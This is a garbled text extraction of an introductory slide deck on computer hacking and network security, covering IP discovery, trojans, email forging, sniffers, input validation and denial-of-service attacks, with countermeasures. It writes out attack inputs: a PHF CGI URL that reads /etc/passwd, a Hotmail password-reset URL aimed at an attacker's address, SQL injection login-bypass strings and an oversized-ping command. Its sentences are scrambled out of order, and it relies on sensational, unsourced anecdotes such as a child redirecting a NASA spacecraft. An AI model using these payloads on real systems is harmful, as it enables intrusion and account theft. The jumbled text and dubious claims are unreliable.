HACKED!!!

² Rourkela
Network Security

COMPUTER HACKING
Ritu Hooda

How to become a Computer Security Expert? 

THINGS TO DO: Learn at least one Programming Language. Become a Networking Guru. Learn to work in the UNIX Shell. Get the Hacking attitude. Read, Read and Read as much as you can!!!!

Hacker VS Cracker 

Qualities of a Hacker : Lots of Knowledge & Experience. Good Guy. Strong Ethics. Never Indulges in Crime. Catches Computer Criminals.  Qualities of a Cracker : Lots of Knowledge & Experience. Bad Guy. Low Ethics. Mostly Indulges in Crime. Is a Computer Criminal himself.

TOP 5 CORPORATE ESPIONAGE ATTACKS ‡ TOP 5 Corporate Espionage Attacks:  Privacy Attacks  Email Forging Attacks  Sniffer Attacks  Input Validation Attacks  DOS Attacks .

Was a techno-freak and loved chatting on the Internet. India lived in a 1 room apartment. Attacker broke into her computer & switched her web camera on! Biggest cyber crime involving privacy invasion in the world! ‡ ‡ ‡ .Individual Internet User Mumbai Lady Case ‡ A lady based in Mumbai.

when the unexpected happened.Government Sector NASA ‡ The premier space research agency in the world. Unnecessary Worry. Had just finished a successful spaceship launch. Loss of money. The path of the spaceship was changed remotely by a 11 year old Russian teenager. ‡ ‡ ‡ .

12  All data sent or received by a system will be addressed from or to the system.http://www. 203.com PRIVACY ON THE INTERNET: IP Addresses  Every system connected to a network has a unique Internet Protocol (IP) Address which acts as its identity on that network. what your telephone number is to you!  An attacker s first step is to find out the IP Address of the target system.94.35.  An IP Address it to your computer. .hackingmobilephones.  An IP Address is a 32-bit address which is divided into four fields of 8bits each. For Example.

http://www.com IP Addresses: Finding an IP Address  A remote IP Address can easily be found out by any of the following methods: Through Instant Messaging Software Through Internet Relay Chat Through Your website Through Email Headers Through Message Board Postings .hackingmobilephones.

http://www. . Ask your friend to come online and chat with you. then the following connection exists between your system and your friend s system: Your System------DIRECT CONNECTION---.Friend¶s System Friend¶s System---------DIRECT CONNECTION------. 2. Case I: If you are chatting on ICQ.com Finding an IP Address via Instant Messengers INSTANT MESSENGERS 1.hackingmobilephones. goto MSDOS or the command line and type: C:\>netstat -n This command will give you the IP Address of your friend s computer.Your System Now.

Case 2: If you are chatting on other messengers like MSN.Your System Thus in this case.Friend s System Friend s System---------Chat Server------. you first have to establish a direct connection with your friend s computer by either sending him a file or by using the call feature. then the following indirect connection exists between your system and your friend s system: Your System------Chat Server---. Then.http://www. goto MSDOS or the command line and type: C:\>netstat -n This command will give you the IP Address of your friend s computer. YAHOO etc.com Finding an IP Address via Instant Messengers 3. .hackingmobilephones.

.hackingmobilephones.com Finding an IP Address via Instant Messengers Countermeasures Do not accept File transfers or calls from unknown people Chat online ONLY after logging on through a Proxy Server.http://www.

Friend s System Case 2: Your System-----Proxy------Chat Server---.com Protecting Your IP Address: Proxy Servers PROXY SERVERS Definition: A Proxy Server acts as a buffer between you and the Internet. hence it protects your identity. Working: Case 1: Your System------Proxy Server---.http://www.Friend s System Good Proxy Servers: Wingate & WinProxy (For Windows Platform) Squid (For Unix Platforms) .hackingmobilephones.

PROXY 3 ---------------.Destination Tools: MultiProxy . Working: YOUR SYSTEM-------.PROXY 2---------.PROXY 5---------.PROXY 4---------.com Protecting Your IP Address: Proxy Servers PROXY BOUNCING Definition: Proxy Bouncing is the phenomenon wherein you connect to several proxy servers and then connect to the actual destination.hackingmobilephones.http://www.PROXY 1--------.

hackingmobilephones. Type the following command to get his IP Address: /whois nicknameofvictim  If this does not work.http://www. Ask your friend to chat with you on IRC.com Finding an IP Address via Internet Relay Chat INTERNET RELAY CHAT  It is very easy to get the IP Address of your friend through IRC: 1. 2. . then one can send a file to the friend and use the netstat command to get his IP Address.

http://www.com Finding an IP Address via Internet Relay Chat Countermeasures    One should connect to the IRC server through a proxy. One can also use the below command to hide one s IP Address: /mode your_nickname +x OR /mode your_nickname +z .hackingmobilephones. One should not accept any files or direct chat requests from unknown people.

One can also make use of the numerous Free Anonymous Surfing Proxy Services. For Example.anonymizer.hackingmobilephones.http://www. www. Countermeasures   One should surf the Internet through a Proxy Server.com Finding an IP Address via your website WEBSITES  One can easily log the IP Addresses of all visitors to their website by using simply JAVA applets or JavaScript code.com .

com with HTTP.3/26Oct99-0620AM) id TAA0000032714.qmail@hotmail. Sun.com> Received: from hotmail.hotmail.1/1.174 by www.http://www.1.com Finding an IP Address via Email Headers EMAIL HEADERS   Hotmail. 23 Jan 2000 05:30:14 PST X-Originating-IP: [202.109.in (8.20.xx. 23 Jan 2000 19:02:21 +0530 (IST) Message-ID: <20000123133014.34531.109.hackingmobilephones. add the IP Address of the sender to each outgoing email.com> Received: from 202.net.54.mtnl.com along with numerous other Email Service Providers. A Typical excerpt of such a Header of an email sent from a Hotmail account is: Return-Path: <x@hotmail.174] .com by delhi1.9. Sun.

com IP Addresses: Dangers & Concerns Dangers & Concerns          DOS Attacks Disconnect from the Internet Trojans Exploitation Geographical Information: Click Here File Sharing Exploits Invades your Privacy Spy on You Steal your Passwords Slow Your Internet Access Speed.http://www.hackingmobilephones. PRIVACY INVASION IS INDEED A REALITY! .

. Password Stealing. Back Orrifice and many others.com TROJANS TROJANS Definition: Trojans act as RATs or Remote Administration Tools that allow remote control and remote access to the attacker. IP Violation. Tools: Netbus. Threats: Corporate Espionage.hackingmobilephones. Spying etc.http://www. Working: See Demo. Girlfriend.

Hence. A typical Key Logger automatically loads itself into the memory. then your system might have a Trojan installed. If you find a irregular port open. one should search all the start up files of the system and remove any references to suspicious programs.hackingmobilephones.com TROJANS COUNTERMEASURES Port Scan your own system regularly. on which you usually do not have a service running. . One can remove a Trojan using any normal Anti-Virus Software.http://www. each time the computer boots.

http://www.com TOP 5 CORPORATE ESPIONAGE ATTACKS ‡ TOP 5 Corporate Espionage Attacks:  Privacy Attacks  Email Forging Attacks  Sniffer Attacks  Input Validation Attacks  DOS Attacks .hackingmobilephones.

Tainted relations.http://www. employees and partners worldwide from the Chairman¶s account.com Consumer Electronic Goods Sector TV Group ‡ One of the largest manufacturers of televisions and other electronic goods in the world. Attacker sent an abusive forged email to all investors. ‡ ‡ .hackingmobilephones.

http://www.hackingmobilephones.com

Email Forging

Email Forging Definition: Email Forging is the art of sending an email from the victim s email account without knowing the password. Working: ATTACKER-----Sends Forged email----- FROM VICTIM Tools: None required! DEMO

http://www.hackingmobilephones.com

Email Forging

COUNTERMEASURES    NOTHING can stop the attacker. Use Secure email systems like PGP. Digitally sign your emails.

http://www.hackingmobilephones.com

TOP 5 CORPORATE ESPIONAGE ATTACKS

‡ TOP 5 Corporate Espionage Attacks:  Privacy Attacks  Email Forging Attacks  Sniffer Attacks  Input Validation Attacks  DOS Attacks

Loss of revenue.com Healthcare Sector Healthcare Group ‡ One of the largest shaving solutions companies in the world. Delay in Product launch. ‡ ‡ .hackingmobilephones.http://www. Attacker broke into network and cancelled approximately 35 different orders of raw materials from supplier.

http://www. Loss of sensitive data.com Government Sector BARC Group ‡ One of the most sensitive atomic and missile research facilities in India. Threat to national security. ‡ ‡ . Pakistani criminal organizations broke into network and stole sensitive missile info.hackingmobilephones.

Tools: Tcpdump.VICTIM Threats: Corporate Espionage. IP Violation. Dsniff and many more. Ethereal.http://www.com SNIFFERS SNIFFERS Definition: Sniffers are tools that can capture all data packets being sent across the entire network in the raw form. Working: ATTACKER-----Uses sniffer for spying----. Password Stealing. . Spying etc.hackingmobilephones.

com SNIFFERS COUNTERMEASURES  Switch to Switching Networks.hackingmobilephones.http://www. IPSec. (Only the packets meant for that particular host reach the NIC) Use Encryption Standards like SSL.  . SSH.

com TOP 5 CORPORATE ESPIONAGE ATTACKS ‡ TOP 5 Corporate Espionage Attacks:  Privacy Attacks  Email Forging Attacks  Sniffer Attacks  Input Validation Attacks  DOS Attacks .hackingmobilephones.http://www.

Came out with the same range of clothes a week before.com Fashion Entertainment Sector Fashion House Group ‡ One of the most successful fashion designers in Europe.http://www.hackingmobilephones. R&D & Creative work down the drain. ‡ ‡ ‡ . Stole all designs and marketing plans. Loss of Revenue.

 Input Validation attacks are more reflective of poor programming practices than smart criminal techniques.e. a problem arises when a program accepts input from the user without validating/verifying it.  Such instances of lazy programming (i. can be exploited by attackers for malicious purposes and are called Input Validation Attacks.com Input Validation Attacks  Users input data into different software on an ongoing basis.  However.hackingmobilephones.  There is usually always some sort of program (software) that accepts the user s input in order to either process it or store it. .http://www. programs where the input is NOT validated).

 Some of the most atrocious examples of Input Validation attacks are: Enter 1000 random characters as the password and gain root access.  Gaining Access to Sensitive Files. Enter the path of the password file in the search box of a website and actually get access to it! .http://www.com Input Validation Attacks DANGERS  Most common dangers of such Input Validation attacks are:  Remote Execution of malicious commands.hackingmobilephones.  Stealing Passwords.

3. Enter the normal input: /cgi-bin/phf?Qalias=x Goto the next line: &0a Exploit the Input validation vulnerability and execute a malicious command: /bin/cat /etc/passwd . 2.abc.com Input Validation Attacks EXAMPLES: Apache Webserver  Apache Webserver (PHF Scripting Language) http://www.com/cgi-bin/phf?Qalias=x&0a/bin/cat&20/etc/passwd This can be re-written as: 1.hackingmobilephones.http://www.

passport.com&id=&cb=&prefem=attacker@attacker.hackingmobilephones.net/emailpwdreset.com Input Validation Attacks EXAMPLES: Hotmail  Hotmail Input Validation Attack https://register.srf?lc=1033&em=victim@ hotmail.com&rst=1 .http://www.

cgi?EMAIL .abc.com/cgi-bin/mailmachine.http://www.cgi    MailMachine is a commonly used CGI script that handles online mailing lists. Unfortunately. http://www.hackingmobilephones.com Input Validation Attacks EXAMPLES: MailMachine. due to poor programming it contains numerous Input Validation attacks: Subscribe/Unsubscribe Anyone YOU want.

com Input Validation Attacks SQL Injection Attacks  SQL injection attacks are a form of input validation attacks wherein the attacker uses specially crafted SQL queries or commands to carry out malicious activities on the target system.   .hackingmobilephones. This vulnerability exists due to a lack of validation of input when a database query is made on the Internet. The best part about SQL injection attacks like most other input validation attacks is that they can easily be executed with the help of only a browser.http://www.

domain.asp?querystring=sports or 1=1 SELECT * FROM database WHERE querystring='sports' or 1=1--' SELECT * FROM database WHERE querystring='sports' or 1=1 . consider the following input: http://www.asp?querystring=sports SELECT * FROM database WHERE querystring='sports'  However.com/index.domain.com/index.hackingmobilephones.com Input Validation Attacks SQL Injection Attacks: Illegal Access  If a user wants to retrieve all records whose name field is SPORTS: http://www.http://www.

com Input Validation Attacks SQL Injection Attacks: Bypassing Security  A number of systems use authentication systems in conjunction with SQL database queries.http://www. then the following query is processed: SELECT PEOPLE from database WHERE Username= TOM AND Password= TOM123' IF <Above SELECT command evaluates to true> {Authorize User} ELSE {User not authorized} . if the user enters TOM as the username and TOM123 as the password.hackingmobilephones. For example.

com Input Validation Attacks SQL Injection Attacks: Bypassing Security  However.http://www.is used to denote the start of comments. when an attacker enters TOM OR 1=1 -.as the username and BLANK as the password.hackingmobilephones. then the following query gets processed: SELECT PEOPLE from database WHERE Username= TOM OR 1=1-AND Password= ' IF <Above SELECT command evaluates to true> {Authorize User} ELSE {User not authorized}  Since -. hence the above query becomes: SELECT PEOPLE from database WHERE Username= TOM OR 1=1 //ALWAYS TRUE .

Make sure that your software validates input.http://www.  Adopt a pro-active approach rather than a re-active one.com Input Validation Attacks COUNTERMEASURES  There are a variety of countermeasures that one must keep in mind to protect against Input Validation attacks:    Restrict User Access and File Access. . Programmers should: Should keep security in mind.hackingmobilephones. Anticipate & test unexpected input situations. Untrusted applications should NOT be allowed to access trusted applications.

com TOP 5 CORPORATE ESPIONAGE ATTACKS ‡ TOP 5 Corporate Espionage Attacks:  Privacy Attacks  Email Forging Attacks  Sniffer Attacks  Input Validation Attacks  DOS Attacks .http://www.hackingmobilephones.

Teardrop. Tribal Flood Network etc [TOOLS] .VICTIM Tools: Ping of Death.http://www. Smurf.hackingmobilephones. Land [TYPES] Trin00.com Denial of Services (DOS) Attacks DOS ATTACKS Definition: Such an attack clogs up so much bandwidth on the target system that it cannot serve even legitimate users. SYN Flooding. Working: ATTACKER-----Infinite/ Malicious Data----.

disrupt in services. Steps involved in DOS Attacks 1.Target Network Target Network gets choked or cannot handle the malicious data and hence crashes. 3. 4.http://www. 2. inconvenience. even legitimate clients/ people cannot connect to the target network. As a result. This results in loss of revenue. Attacker---------Infinite/ Malicious Data-.hackingmobilephones. .com Denial of Services (DOS) Attacks: Steps Involved. customer dissatisfaction and many other problems.

is sent to the target system.http://www. then it crashes. In the Ping of Death Attack. reboots or hangs. As soon as the target system receives a packet exceeding the allowable size.com DOS Attacks: Ping of Death Attack PING OF DEATH The maximum packet size allowed to be transmitted by TCP\IP on a network is 65 536 bytes. This attack can easily be executed by the ping command as follows: ping -l 65540 hostname . a packet having a size greater than this maximum size allowed by TCP\IP.hackingmobilephones.

2. Say data of 4000 bytes is to be sent across a network.  CHUNK A contains Bytes 1 to 1500. is broken down into smaller fragments at the source system and then reassembled into larger chunks at the destination system. then it is broken down into three chunks: 1. range of CHUNK B is 1501 to 3000 while the range of CHUNK C is 3001 to 4000.http://www. CHUNK B contains Bytes 1501 to 3000 CHUNK C contains Bytes 3001 to 4000 In this example the range of CHUNK A is 1 to 1500. .hackingmobilephones. 3. For Example.com DOS Attacks: Tear Drop Attack TEAR DROP ATTACKS  Data sent from the source to the destination system.

Thus. range of CHUNK B is 1499 to 3000 while the range of CHUNK C is 2999 to 4000. CHUNK B contains Bytes 1499 to 3000 CHUNK C contains Bytes 2999 to 4000 In this example the range of CHUNK A is 1 to 1500. the same 4000 bytes would be broken down into the below three chunks: CHUNK A contains Bytes 1 to 1500. For Example. the target system gets DOS ed!!! 1.com DOS Attacks: Tear Drop Attack Contd.http://www. Since here the ranges are overlapping. 3. in case of a Teardrop attack. 2.hackingmobilephones.   . in case of a Teardrop attack. the ranges are overlapping. TEAR DROP ATTACKS  However. these ranges of data chunks are overlapping.

  .http://www. restart or hang up. Countermeasure Filter out all incoming packets which either:  Has its source address same as any internal system. Due to infinite loops thus generated and due to the large number of Ping Requests. a huge number of Ping Requests are sent to the broadcast address of the target network.hackingmobilephones. using Spoofed IP Addresses from within the target network.com DOS Attacks: SMURF Attacks SMURF ATTACKS  In SMURF Attacks. There is NO reason why external systems need to send data to the broadcast address.  Has its target address as the broadcast address. the target network will crash.

hackingmobilephones. in a LAND attack. Countermeasure: Simple filtering should solve the problem. The same source and target address and port number crashes the victim system. Hence.http://www. . the attacker sends infinite packets to the victim system from the victim system itself (Spoofing!).com DOS Attacks: Land Attacks LAND ATTACKS     Some implementations of TCP/IP are vulnerable to packets which originate and terminate from the same IP Address.

SYN Packet----.hackingmobilephones.Host Host------.com DOS Attacks: SYN Flooding SYN Flooding  Normally. 2.Host SYN Flooding exploits this classic 3-way TCP/IP handshake.Spoofed Address .http://www.ACK Packet--. This creates infinite threads in the following half-open state: Spoofed Address--.  Client---.SYN Packet---. 3. the attacker sends infinite SYN Packets to the victim computer from spoofed IP Addresses.SYN/ACK Packet-----.Host Host----.SYN\ACK Packet-. Here. each TCP/IP connection is established in the classic 3-way handshake or process: 1.Client Client---.

The Spoofed IP Address is a system within the victim network.hackingmobilephones. .http://www. can lead to 3 different scenarios:    The Spoofed IP Address does NOT exist. The Spoofed IP Address exists.com DOS Attacks: SYN Flooding SYN Flooding  The Spoofed Address used by the attacker.

Distributed-DOS Attacks Several attackers.hackingmobilephones. More Effective.com Distributed Denial of Service Attacks (dDOS Attacks) 1. Not that effective.http://www. . DOS Attacks VS Distributed DOS Attacks DOS Attacks Only ONE Attacker.

Attacker uses all these 100 systems to attack the actual target T. Hence.com Distributed Denial of Service Attacks (dDOS Attacks) STEPS INVOLVED IN dDOS ATTACKS     Attacker takes control of a less secure network say X. Let us assume that there are 100 systems in X s network. instead of one attacker.http://www. .hackingmobilephones. there are 100 attackers.

http://www. Communicates using ICMP. SYN Floods or UDP floods on the target system. Hence difficult to block without affecting regular traffic.Clients--------------.com Distributed Denial of Service Attacks (dDOS Attacks) Tools: Tribal Flood Network (TFN)     Attacker----------------.  . TCP and UDP protocols. TFN2K uses random ports for communication purposes making detection all the more difficult.Daemons Allows TCP Floods.hackingmobilephones. No authorization required to use TFN clients.

com Distributed Denial of Service Attacks (dDOS Attacks) Tools: Trin00    Attacker----------------. Allows multiple layered Masters. Trin00 clients are password protected and do not allow illicit usage.hackingmobilephones. the password is stored in plaintext in the source code itself.Masters--------------.Daemons Allows UDP floods on the target system.http://www.   . All communication takes place on specific UDP and TCP ports. However.

Uses default TCP ports (16660.hackingmobilephones.http://www.  . Communicates using the ICMP protocol.com Distributed Denial of Service Attacks (dDOS Attacks) Tools: Stacheldraht (Barbed Wire)     Attacker--------. 65000) for communication. Hence.Daemons (Agents) Combines the best features of both TFN and Trin00.Masters(Handlers)------. All communication is encrypted using single key encryption. Can be changed. difficult to block without affecting regular traffic.

com Denial of Services (DOS) Attacks BUSINESS THREATS All services unusable. . Deadlines can be missed.hackingmobilephones. All users Disconnected. Loss of revenue.http://www. Share Values go down. Customer Dissatisfaction. Unnecessary Inefficiency and Downtime.

Filter out USELESS/MALICIOUS traffic as early as possible.com DOS Attacks COUNTERMEASURES          Separate or compartmentalize critical services. Use scanning tools to detect and remove DOS tools.http://www. Balance traffic load on a set of servers. Regular monitoring and working closely with ISP will always help! Patch systems regularly. Disable publicly accessible services. Buy more bandwidth than normally required to count for sudden attacks. IPSec provides proper verification and authentication in the IP protocol.hackingmobilephones. .

Invest on a dedicated security team. Security by obscurity? ‡ ‡ ‡ .http://www.com Recommendations and Countermeasures ‡ ‡ National CERTS and Cyber Cops. Security EDUCATION and TRAINING.hackingmobilephones. Increase Security budgets.

com THE FINAL WORD THE FINAL WORD The biggest threat that an organization faces continues to be from . THEIR OWN EMPLOYEES! .http://www.hackingmobilephones.

Unencrypted PIN Number.com Is Internet Banking Safer than ATM Machines? ATM MACHINES VS INTERNET BANKING ATM Machines Easier to crack.http://www. Fake ATM Machine Internet Banking Difficult to crack. . Software/ Hardware Sniffer. Earlier SSL standards quite weak.hackingmobilephones. Soft Powdery Substance. if latest SSL used.

http://www.hackingmobilephones.com ATM Hacking .

http://www.hackingmobilephones.com ATM Hacking .

com ATM Hacking .hackingmobilephones.http://www.

com ATM Hacking .http://www.hackingmobilephones.

hackingmobilephones.com Mobile Phone Hacking Mobile Phone Attacks  Different Types:           BlueJacking BlueSnarfing BlueBug Attacks Failed Authentication Attacks Malformed OBEX Attack Malformed SMS Text Message Attack Malformed MIDI File DOS Attack Jamming Viruses and Worms Secret Codes: *#92702689# or #3370* .http://www.

http://www. .hackingmobilephones.com AN ETHCAL GUIDE TO HACKING MOBILE PHONES Ankit Fadia Title: An Ethical Hacking Guide to Hacking Mobile Phones Author: Ankit Fadia Publisher: Macmillan India Ltd.

com THE UNOFFICIAL GUIDE TO ETHICAL HACKING Ankit Fadia Title: The Unofficial Guide To Ethical Hacking Author: Ankit Fadia Publisher: Macmillan India Ltd.hackingmobilephones.http://www. .

com NETWORK SECURITY: A HACKER·S PERSPECTIVE Ankit Fadia Title: Network Security: A Hacker s Perspective Author: Ankit Fadia Publisher: Macmillan India Ltd.hackingmobilephones.http://www. .

hackingmobilephones. .http://www.com THE ETHICAL HACKING GUIDE TO CORPORATE SECURITY Ankit Fadia Title: The Ethical Hacking Guide to Corporate Security Author: Ankit Fadia Publisher: Macmillan India Ltd.

com THE ETHICAL HACKING SERIES Ankit Fadia Title: Email Hacking Author: Ankit Fadia Publisher: Vikas Publications Title: Windows Hacking Author: Ankit Fadia Publisher: Vikas Publications .hackingmobilephones.http://www.

hackingmobilephones.ankit@gmail.http://www.com HACKED!!! ² Rourkela Network Security Questions? Ankit Fadia Intelligence Consultant cum Author fadia.com .

Sign up to vote on this title
UsefulNot useful